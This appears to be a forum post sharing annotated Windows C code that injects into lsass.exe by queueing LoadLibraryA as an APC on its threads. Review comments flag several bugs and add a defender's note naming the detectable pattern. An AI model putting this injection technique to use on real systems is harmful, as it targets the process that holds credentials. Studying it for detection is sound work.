[原创]今天突然想注入,写了点代码
发表于:
2012-4-3 15:13
/*
 * Scan forward from dllbase for the first byte offset at which the remaining
 * C string compares equal, case-insensitively, to ".dll".
 *
 * dllbase: base address of a module image already mapped in this process
 *          (the caller passes the HINSTANCE of ntdll.dll).
 * Returns: the byte offset of that ".dll" from dllbase, or 65535 when no
 *          match was found within that distance. Offset 0 is never tested;
 *          the scan starts at offset 1.
 *
 * Side effect: prints the string beginning 5 bytes before the match, with
 * no trailing newline. The "- 5" presumes the matched name is five
 * characters long ("ntdll"); a match of any other length prints from the
 * wrong position, and a match at an offset below 5 reads before dllbase.
 *
 * NOTE(review): the compare works on raw image bytes and has no upper bound
 * on how far a single strcmp-style read may run past the scan window.
 */
DWORD GetNtDllString(HANDLE dllbase)
{
    const char *image = (const char *)dllbase;
    DWORD offset = 0;

    for (;;) {
        ++offset;
        /* The compare runs before the distance check, so the byte at
         * offset 65535 is still examined before the scan gives up. */
        if (stricmp(image + offset, ".dll") == 0)
            break;
        if (offset >= 65535)
            break;
    }

    printf("%s", image + offset - 5);
    return offset;
}
/*
 * Entry point: enumerates processes via ZwQuerySystemInformation, finds the
 * entry named lsass.exe, and queues a user APC that runs LoadLibraryA on
 * each thread of that process. The LoadLibraryA argument is an address
 * inside this process's ntdll.dll image (see dll_name below), not a buffer
 * written into the target.
 *
 * NTQUERYSYSTEMINFORMATION, PSYSTEM_PROCESSES, STATUS_* and
 * SystemProcessesAndThreadsInformation are declared in headers not shown
 * here.
 *
 * Defender's note: the visible sequence -- process enumeration, then
 * OpenThread(THREAD_SET_CONTEXT) on lsass.exe threads, then
 * QueueUserAPC(LoadLibraryA) -- is the classic APC-based DLL injection
 * pattern. Thread-access and APC activity against lsass.exe from an
 * unrelated process is the telemetry point to watch.
 *
 * Returns 0 on success, -1 if the size query, the allocation or the second
 * ZwQuerySystemInformation call fails.
 */
int main(int argc, char* argv[])
{
/* Base address of ntdll.dll as loaded in this process. */
HINSTANCE ntdll_dll = GetModuleHandle("ntdll.dll");
NTQUERYSYSTEMINFORMATION ZwQuerySystemInformation;
PSYSTEM_PROCESSES pSp=NULL;
ULONG retureSize = 0;
DWORD status;
unsigned char *buf;
/* GetNtDllString returns the offset of the first ".dll" it finds in the
 * ntdll image; backing up 3 bytes yields the last three characters before
 * that ".dll" plus ".dll" itself (if the match is inside "ntdll.dll", the
 * string is "dll.dll"). The pointer lies inside ntdll's image, so the code
 * presumably expects the same address to hold the same bytes in the target
 * process -- nothing here verifies that. */
char * dll_name = (char*)ntdll_dll + GetNtDllString(ntdll_dll) - 3;
printf("CurrentThreadId %d\ninject dll name:%s\n",
GetCurrentThreadId(), dll_name);
/* Resolved dynamically from ntdll rather than linked against an import. */
ZwQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(ntdll_dll, "ZwQuerySystemInformation");
/* First call with a NULL, zero-length buffer only reports the required size;
 * the expected status for that case is STATUS_INFO_LENGTH_MISMATCH. */
status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, NULL, 0, &retureSize);
if (status != STATUS_INFO_LENGTH_MISMATCH)
return -1;
buf = malloc(retureSize);
if (buf ==NULL)
return -1;
/* Second call fills the buffer. NOTE(review): buf is leaked on this
 * failure path -- there is no free() before the return. */
status = ZwQuerySystemInformation(SystemProcessesAndThreadsInformation, (PVOID)buf, retureSize, NULL);
if (status != STATUS_SUCCESS)
return -1;
pSp = (PSYSTEM_PROCESSES)buf;
do {
/* Advances to the next entry before inspecting it, so the first entry at
 * buf is never examined. The cast through unsigned long truncates the
 * pointer on 64-bit Windows (LLP64: unsigned long is 32 bits wide). */
pSp = (PSYSTEM_PROCESSES)( (unsigned long)pSp + pSp->NextEntryDelta );
/* Match on the image name only, case-insensitively. */
if (pSp->ProcessName.Buffer
&& _wcsicmp(pSp->ProcessName.Buffer, L"lsass.exe") == 0){
ULONG i;
for (i =0; i<pSp->ThreadCount; i++) {
HANDLE pthread;
/* The OpenThread result is not checked; on failure pthread is NULL and
 * the QueueUserAPC below should fail and print the error line. */
pthread = OpenThread(THREAD_SET_CONTEXT, FALSE, (DWORD)pSp->Threads[i].ClientId.UniqueThread);
/* Prints "process <pid> thread:<tid>" (message text is Chinese). The
 * ClientId fields are HANDLE-sized; %d presumes they fit in an int. */
printf("进程 %d 线程:%d\r\n",
pSp->Threads[i].ClientId.UniqueProcess,
pSp->Threads[i].ClientId.UniqueThread);
/* Queues LoadLibraryA(dll_name) as a user-mode APC on the target thread;
 * it runs only when that thread next enters an alertable wait. */
if (!QueueUserAPC((PAPCFUNC)LoadLibraryA, pthread, (ULONG_PTR)dll_name))
printf("QueueUserAPC error\n");
CloseHandle(pthread);
}
/* Only the first lsass.exe entry is handled. */
break;
}
} while ( pSp->NextEntryDelta != 0 );
free(buf);
/* Keeps this process alive until a key is pressed. The wait is alertable,
 * but the APCs were queued to another process's threads, so that flag
 * presumably has no effect on their delivery. */
while (!kbhit())
SleepEx(100, TRUE);
return 0;
}